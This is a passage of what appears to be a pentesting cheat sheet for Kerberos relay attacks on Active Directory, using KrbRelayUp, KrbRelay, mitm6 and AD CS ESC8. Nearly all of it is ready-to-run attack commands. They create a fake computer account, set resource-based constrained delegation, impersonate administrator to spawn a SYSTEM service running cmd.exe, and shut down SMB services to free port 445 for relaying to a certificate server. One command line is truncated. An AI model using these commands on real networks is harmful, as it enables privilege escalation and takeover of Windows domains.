mitm6 + Kerberos DNS Relay + AD CS ESC8
Relay authentication to LDAP(S) with automatic machine creation and configure RBCD:
Copy PS > .\KrbRelayUp.exe RELAY [-d|--Domain megacorp.local] [-dc|--DomainController DC01.megacorp.local] [-m|--Method RBCD] -c|--CreateNewComputerAccount [-cn|--ComputerName FAKEMACHINE$] [-cp|--ComputerPassword Passw0rd!]
Copy PS > .\KrbRelayUp.exe RELAY -u2u -cn j.doe -cp Passw0rd!
Copy PS > .\KrbRelayUp.exe SPAWN [-m|--Method RBCD] [-i|--Impersonate administrator] [-s|ServiceName PwnSVC] [-sc|--ServiceCommand C:\Windows\System32\cmd.exe] -cn|--ComputerName FAKEMACHINE$ -cp|--ComputerPassword Passw0rd! [or -ch|--ComputerPasswordHash fc525c9683e8fe067095ba2ddc971889]
As @ShitSecure mentioned, executing the binary as a .NET Reflective Assembly from PowerShell will fail because the PowerShell process will have already initialized the security parameters for COM itself after having been launched, so CoInitializeSecurity
will not contain those new parameters attempted to set by KrbRelay(Up).
sc config LanmanServer start= auto & sc start LanmanServer & sc start srv2 & sc start srvnet sc config LanmanServer start= disabled & sc stop LanmanServer & sc stop srv2 & sc stop srvnet
PS > Set-Service -Name LanmanServer -StartupType Disabled; Stop-Service -Name LanmanServer -Force; Stop-Service -Name srv2 -Force; Stop-Service -Name srvnet -Force
PS > .\KrbRelay.exe -spn HTTP/ADCS.megacorp.local -redirecthost adcs1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -endpoint certsrv -adcs DomainController -listenerport 445
$ -d megacorp.local -u snovvcrash -k -no-pass adcs1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA
PS > Set-Service -Name LanmanServer -StartupType Automatic; Start-Service -Name LanmanServer; Start-Service -Name srv2; Start-Service -Name srvnet